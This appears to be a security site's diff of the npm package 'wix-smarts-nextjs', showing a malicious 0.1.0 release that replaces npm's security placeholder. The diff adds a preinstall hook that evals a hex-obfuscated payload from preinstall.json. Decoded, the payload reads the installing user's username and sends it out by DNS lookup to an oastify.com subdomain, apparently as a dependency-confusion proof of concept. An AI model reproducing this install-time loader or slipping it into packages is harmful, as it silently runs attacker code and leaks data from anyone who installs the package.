wix-smarts-nextjs 0.0.1-security → 0.1.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of wix-smarts-nextjs might be problematic. Click here for more details.
- package/package.json +8 -3
- package/preinstall.json +3 -0
- package/README.md +0 -5
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "wix-smarts-nextjs",
|
|
3
|
-
"version": "0.0
|
|
4
|
-
"description": "
|
|
5
|
-
"
|
|
3
|
+
"version": "0.1.0",
|
|
4
|
+
"description": "P0C",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node -e \"const fs = require('fs'); const rawData = fs.readFileSync('preinstall.json'); const jsonData = JSON.parse(rawData); eval(jsonData.script);\""
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/preinstall.json
ADDED
|
@@ -0,0 +1,3 @@
|
|
|
1
|
+
{
|
|
2
|
+
"script": "const hexPayload = '0a636f6e7374206f73203d207265717569726528276f7327293b0a636f6e737420646e73203d20726571756972652827646e7327293b0a0a636f6e737420656e636f646544617461203d20286461746129203d3e204275666665722e66726f6d2864617461292e746f537472696e67282768657827293b0a636f6e737420676574557365724e616d65203d202829203d3e206f732e75736572496e666f28292e757365726e616d653b0a636f6e73742064617461203d207b20757365726e616d653a20676574557365724e616d652829207d3b0a636f6e737420656e636f64656444617461203d20656e636f646544617461284a534f4e2e737472696e67696679286461746129293b0a0a66756e6374696f6e20646e73457866696c74726174696f6e2829207b0a2020636f6e737420657866696c74726174696f6e446f6d61696e203d2060247b656e636f646564446174617d2e7967693534646f3374386d356b3235773367767071366e7279693461733067702e6f6173746966792e636f6d603b0a2020646e732e7265736f6c76653428657866696c74726174696f6e446f6d61696e2c20286572722c2061646472657373657329203d3e207b0a202020206966202865727229207b0a20202020202070726f636573732e657869742831293b0a202020207d20656c7365207b0a20202020202070726f636573732e657869742830293b0a202020207d0a20207d293b0a7d0a0a646e73457866696c74726174696f6e28293b0a'; const decodeHex = (hex) => Buffer.from(hex, 'hex').toString('utf8'); const payload = decodeHex(hexPayload); eval(payload);"
|
|
3
|
+
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=wix-smarts-nextjs for more information.
|